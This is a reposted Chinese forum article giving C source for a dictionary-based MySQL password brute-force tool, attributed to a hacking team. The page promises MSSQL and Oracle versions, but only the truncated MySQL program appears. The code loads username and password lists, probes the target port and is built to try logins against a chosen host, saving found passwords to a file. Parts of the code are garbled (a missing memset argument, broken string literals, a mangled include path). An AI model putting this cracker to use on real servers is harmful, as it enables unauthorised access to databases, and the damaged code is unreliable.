当前位置:数据库 > Oracle >>

用链表实现的MYSQL、MSSQL和oracle密码暴破C程序


		议题作者:pt007[at]vip.sina.com版权所有,转载请注明版权
信息来源:邪恶八进制信息安全团队
/*程序一:用链表实现的MYSQL密码暴破程序,参考了zhouzhen@gmail.com的程序,进行了一些修改*/
#define WIN32_LEAN_AND_MEAN
#if defined(_WIN32) || defined(_WIN64)
#include <windows.h>
#include <Tchar.h>
#endif
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include "F:pt007fdatabasemysqlmysql_pwd_crackincludemysql.h"
#include <stdlib.h>
//链接到WS2_32.LIB库:
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "libmySQL.lib")
//定义链表:
typedef struct PassNode{
TCHAR password[100];
struct PassNode * Next;
} PassInfo;
typedef struct NameNode{
TCHAR Name[100];
struct NameNode * Next;
}NameInfo;
void usage(){
printf("mysql password crack v 1.0
");
printf("	 author:zhouzhen@gmail.com and pt007@vip.sina.com

");
fprintf(stdout,"usage : mysql_pwd_crack [ip] [options]
");
printf("options:
"
"	-u username specify the username of mysql
"
"	-x port specify the port of mysql
"
"	-p password specify the password of mysql
"
"	-d dict specify the dictionary
"
"	-a automode automatic crack the mysql password 
"
"	Note: when u use the -a option, named the username dict user.dic
"
"	 password dict pass.dic
"
);
printf("
example: mysql_pwd_crack 127.0.0.1 -x 3306 -u sql_user.dic -d pass.dic
");
printf("	 mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.dic
");
printf("	 mysql_pwd_crack 127.0.0.1 -x 3306 -a
");
exit(1);
}
PassInfo * Create_Pass_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempPass = NULL;
PassInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
if ( (h = (PassInfo *) malloc(sizeof(PassInfo))) == NULL )
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL;
p = h;
for ( i=0; i < NodeNum; i ++)
{
szTempPass = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempPass, 100);
if ( (s = (PassInfo *)malloc(sizeof(PassInfo))) == NULL)
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
}
memset(s->password, , 100);
fgets(szTempPass, 100, DictFile);
strncpy(s->password, szTempPass, strlen(szTempPass)-1);
s->Next =NULL;
p->Next = s;
p = s;
free(szTempPass);
}
return h;
}
NameInfo * Create_Name_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempName = NULL;
NameInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
if ( (h = (NameInfo *) malloc(sizeof(NameInfo))) == NULL )
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL;
p = h;
for ( i=0; i < NodeNum; i ++)
{
szTempName = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempName, 100);
if ( (s = (NameInfo *)malloc(sizeof(NameInfo))) == NULL)
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
}
memset(s->Name, , 100);
fgets(szTempName, 100, DictFile);
strncpy(s->Name, szTempName, strlen(szTempName)-1);
s->Next =NULL;
p->Next = s;
p = s;
free(szTempName);
}
return h;
}
int LineCount(FILE * fd) //返回字典中的密码数量
{
int countline = 0;
char data[100] = {0};//字符数组清0
while (fgets(data, 100, fd))//从指定的文件中读一个字符串到字符数组中
countline++;
rewind(fd);//指针返回到文件起始处
return countline;
}
BOOL IsPortOpen(char * address, int port)
{
int recv = 1;
WSADATA wsadata;
int fd;
struct sockaddr_in clientaddress;
struct hostent * host1;
BOOL Result = FALSE;
struct timeval timer4;
fd_set writefd; //检查数据是否可写
ULONG value = 1;
//初使化winsock版本1.1:
recv = WSAStartup(MAKEWORD(1,1), &wsadata);
if(recv != 0)
{
printf("init failed %d.
",WSAGetLastError());
return(0);
}
if ( LOBYTE( wsadata.wVersion ) != 1 ||
HIBYTE( wsadata.wVersion ) != 1 ) {
/* Tell the user that we couldnt find a useable */
/* winsock.dll. */
WSACleanup();
return(0);
}
//创建socket套接字连接:
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(fd < 0)
{
printf("[-] Create socket error %d. 
",WSAGetLastError());
return(0);
}
//将套接字fd设为非阻塞模式的方法:
ioctlsocket(fd,FIONBIO,&value);
if (!(host1 = gethostbyname(address))){
printf("[-] Gethostbyname(%s) error %d.
",address,WSAGetLastError());
return(0);
}
memset(&clientaddress, 0, sizeof(struct sockaddr));
clientaddress.sin_family =AF_INET;//Ipv4地址族
clientaddress.sin_port = htons((unsigned short)port);
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr);
timer4.tv_sec = 5;//以秒为单位指定等待时间
timer4.tv_usec = 0;
FD_ZERO(&writefd);
FD_SET(fd,&writefd); //将套接字fd增添到writefd写集合中进行测试
recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr));
if( FD_ISSET(fd, &writefd))
{
recv = select(fd+1, NULL, &writefd, NULL, &timer4);//测试5秒钟内是否有数据写入
if( recv > 0 )
Result = TRUE;
}
closesocket(fd);
WSACleanup();
return Result;
}
int main(int argc, char **argv)
{
MYSQL *sock,mysql;//定义MYSQL结构
PassInfo * head, * curr = NULL;
NameInfo * headnode, * currnode = NULL;
int namecount = 0, passcount = 0;
/////////////////////////////////////////////////////////////////////////////////////////////
// deal with the command line
//
/////////////////////////////////////////////////////////////////////////////////////////////
if( argc != 5) //参数不为5或8个的时候打印帮助
if(argc != 8)
usage();
if (argc == 8)
{
if ( strcmpi(argv[2], "-x") )
usage();
if ( strcmpi(argv[4], "-u") )
if ( strcmpi(argv[4], "-p") )
usage();
if ( !strcmpi(argv[4], "-u") )
if ( strcmpi(argv[6], "-d") )
usage();
if ( !strcmpi(argv[4], "-p") )
if ( strcmpi(argv[6], "-d") )
usage();
}
if (argc == 5)
{
if ( strcmpi(argv[2], "-x") )
usage();
if ( strcmpi(argv[4], "-a") )
usage();
}
/* determinate whether the mysql port is open */
if( !IsPortOpen(argv[1], atoi(argv[3]) ) )
{
printf("error:Cant connect to %s:%d
", argv[1], atoi(argv[3]));
exit(0);
}
////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the username
//////////////////////////////////////////////////////////////////////////////////////////////
mysql_init(&mysql); /* init the mysql */
if ( !strcmpi(argv[4], "-u"))
{
/* open the password dictionary */
FILE * passdic = NULL;
if ( (passdic = fopen(argv[7], "r")) ==NULL){
fprintf(stdout, "Cant open the password dictionary
");
exit(0);
}
/* count line of name dictionary */
passcount = LineCount(passdic); //计算密码的数量
head = Create_Pass_link(passcount, passdic); /* create the password link */
curr = head ->Next;
/* open the password dictionary */
FILE * Namedict = NULL;
if ( (Namedict = fopen(argv[5], "r")) ==NULL){
fprintf(stderr, "Cant open the name dictionary
");
exit(0);
}
/*密码最终保存文件*/
FILE *passtxt=NULL;
if ( (passtxt = fopen("pass.txt", "at+")) ==NULL){
fprintf(stdout, "Cant write pass.txt file!
");
exit(0);
}
/* count line of name dictionary */
namecount = LineCount(Namedict);//计算用户名数量
headnode = Crea						
		
	
补充:综合编程 , 安全编程 ,

上一个:安全探讨之用Win32汇编写双进程守护
下一个:如何设定执行Java程序的Linux安全环境

更多图片编程知识:
更多Oracle疑问解答:
运行exp备份oracle数据库提示oracle-12154错误
有没有,生产Oracle Rman 备份脚本的工具啊!
初学orcle,希望有大大帮忙解说一下详细步骤,从登录oracle到创建表的过程
oracle语句问题:一张user表,三个字段,id,name,time,插入记录比如:张三2007,李四2008,张三2011
如何写一个ORACLE触发器同步两个表中的数据?
oracle 如何查看一个服务器上有多少个数据库.
oracle 创建包的时候错误 求解
oracle 重复列的问题
oracle 中如何查处2星期前的数据
请教oracle数据库安装中的问题
请问谁能提供给我标准的oracle ERP的数据库表结构并详细说明各表主要的作用?
安装oracle遇到的问题 invalid entry CRC (expected 0x3e12e795 but got 0x9db0e9fd)
我的是ORACLE 10G,在RMAN中如何按指定的时间恢复数据文件啊?
oracle为什么没有自动增长列
oracle快捷键都有哪些啊?
Oracle
MySQL
Access
SQLServer
DB2
Excel
SQLite
SYBASE
Postgres
如果你遇到数据库难题:
请访问www.zzzyk.com 试试
CopyRight © 2012 站长网 编程知识问答 www.zzzyk.com All Rights Reserved
部份技术文章来自网络,